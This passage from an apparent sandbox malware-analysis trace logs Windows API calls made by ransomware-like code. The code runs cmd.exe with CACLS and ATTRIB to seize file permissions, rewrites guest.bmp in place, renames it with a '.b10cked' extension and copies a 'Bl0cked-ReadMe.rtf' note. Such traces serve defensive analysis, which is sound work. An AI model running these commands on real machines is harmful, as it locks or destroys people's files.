(hObject=0x1b4) returned 1 [0191.936] CloseHandle (hObject=0x120) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] ReleaseMutex (hMutex=0xf8) returned 1 [0191.936] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.936] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", lpFilePart=0x12eab4*="usertile43.bmp") returned 0x52 [0191.936] GetLastError () returned 0x5 [0191.936] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.936] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.936] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0191.937] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.937] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.937] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.937] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.937] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.937] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.937] ReleaseMutex (hMutex=0xf8) returned 1 [0191.937] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0191.937] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", lpFilePart=0x12eab4*="usertile44.bmp") returned 0x52 [0191.937] GetLastError () returned 0x5 [0191.937] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.937] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.937] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.937] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.938] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.938] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.938] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0191.938] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0191.938] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa90, dwThreadId=0xad8)) returned 1 [0191.939] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0192.414] CloseHandle (hObject=0x1b4) returned 1 [0192.414] CloseHandle (hObject=0x120) returned 1 [0192.414] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.414] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 [0192.415] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0192.415] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile44.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", lpFilePart=0x12eab4*="usertile44.bmp") returned 0x52 [0192.415] GetLastError () returned 0x5 [0192.415] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0192.415] LocalFree (hMem=0x1c6cc8) returned 0x0 [0192.415] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0192.415] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0192.415] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0192.415] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0192.415] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0192.415] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0192.415] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.415] ReleaseMutex (hMutex=0xf8) returned 1 
[0192.415] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.416] ReleaseMutex (hMutex=0xf8) returned 1 [0192.416] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.416] ReleaseMutex (hMutex=0xf8) returned 1 [0192.416] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0192.416] ReleaseMutex (hMutex=0xf8) returned 1 [0192.416] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=24920539406) returned 1 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.416] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc038 [0192.417] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0192.417] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbb50 [0192.417] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc038 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc038 [0192.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0192.451] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0192.451] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0192.480] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0192.480] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0192.480] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0192.480] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x601b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x601b, lpOverlapped=0x0) returned 1 [0192.481] SetFilePointer (in: hFile=0x120, lDistanceToMove=-24603, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x601d [0192.481] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x601b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x601b, lpOverlapped=0x0) returned 1 [0192.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="guest.bmp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0192.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="guest.bmp", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="guest.bmp", lpUsedDefaultChar=0x0) returned 9 [0192.485] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc038 [0192.485] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0192.485] CloseHandle (hObject=0x120) returned 1 [0192.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp") returned 0x2d [0192.487] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0192.487] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xaa4, dwThreadId=0xb2c)) returned 1 [0192.495] CloseHandle (hObject=0x1b4) returned 1 [0192.495] CloseHandle (hObject=0x120) returned 1 [0192.495] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", 
cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0192.495] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0192.496] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount1=51, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 1 [0192.496] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchLength=0x33 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\") returned 0x33 [0192.496] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0192.496] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0192.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0192.496] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0192.496] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0192.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\") returned 0x24 [0192.496] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | 
